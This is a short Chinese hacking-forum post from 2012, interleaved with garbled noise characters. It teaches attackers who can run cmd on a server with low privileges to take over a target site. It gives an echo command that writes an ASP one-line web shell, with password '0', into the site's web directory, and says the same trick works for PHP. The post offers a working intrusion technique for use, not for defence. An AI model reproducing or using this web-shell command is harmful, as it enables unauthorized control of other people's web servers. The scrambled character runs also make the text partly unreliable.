在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。) D% `! f" K0 H) b, X6 j" l* ^( Q
6 p5 X* S$ l. f/ d+ Q# w6 p3 ^
命令格式
0 x B4 n6 i+ \ N& K8 z/ K
- o% b& P* s) m0 F: t9 YEcho 语句 >目标站绝对目录
8 j0 a7 m+ s/ i8 i, e% i+ l5 i: }. T9 s
例如:
) N7 M3 ]( w8 V1 w: b* o0 V
2 {8 S. t# X2 ]/ C/ eecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
9 m) M& i% F! ~$ Y
: T* {( d0 ~+ K+ _5 g& F( q这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
% N( U$ A" O% {( d* W' Q |
发表于 2012-9-23 14:40:24
收藏
支持
反对